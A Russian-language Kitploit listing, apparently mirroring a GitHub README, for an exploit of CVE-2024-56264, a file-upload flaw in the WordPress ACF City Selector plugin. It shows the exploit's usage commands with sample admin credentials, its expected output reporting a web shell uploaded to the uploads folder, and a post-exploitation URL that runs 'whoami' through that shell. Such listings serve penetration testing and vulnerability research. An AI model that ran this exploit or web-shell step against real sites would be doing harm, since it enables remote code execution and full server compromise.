Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-56264 | Kitploit
Инструменты/GitHubGitHub/dpakmrya/cve-2024-56264
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubdpakmrya/cve-2024-56264

CVE-2024-56264

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-56264

WordPress ACF City Selector — Эксплойт произвольной загрузки файлов (CVE-2024-56264)

Обзор

Этот репозиторий содержит эксплойт для CVE-2024-56264 — уязвимости произвольной загрузки файлов, обнаруженной в плагине WordPress ACF City Selector (версии <= 1.14.0). Данная уязвимость позволяет атакующему загрузить вредоносный PHP-файл (веб-шелл) на уязвимый экземпляр WordPress и выполнять произвольные команды на сервере.

Сведения о CVE

  • Идентификатор CVE: CVE-2024-56264
  • Дата публикации: 2 января 2025 года
  • Затронутый плагин: ACF City Selector
  • Уязвимые версии: <= 1.14.0
  • Воздействие: удаленное выполнение кода (RCE) через неограниченную загрузку файлов

Описание

Плагин ACF City Selector не выполняет надлежащую проверку загружаемых файлов, что позволяет атакующим обходить ограничения и загружать произвольные PHP-файлы. После загрузки вредоносного PHP-файла атакующий может удаленно выполнять системные команды, что приводит к полной компрометации сервера.

Требования

📌 Зависимости

Убедитесь, что перед запуском скрипта установлено следующее:

  • Python 3.x
  • Модуль requests (установка с помощью: pip install requests)

Вы можете установить все необходимые зависимости с помощью:

root@kitploit:~
pip install -r requirements.txt

🚀 Использование

Запуск эксплойта:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

Пример:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Ожидаемый результат

При успешной эксплуатации вы должны увидеть:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Пост-эксплуатация

В случае успеха получите доступ к загруженному веб-шеллу по адресу:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Это позволяет удаленно выполнять команды на сервере.

⚠ Отказ от ответственности

Этот скрипт предназначен только для образовательных и авторизованных целей тестирования безопасности. Несанкционированное использование незаконно и может повлечь серьезные последствия. Автор не несет ответственности за любое неправомерное использование данного эксплойта.

Скачать инструмент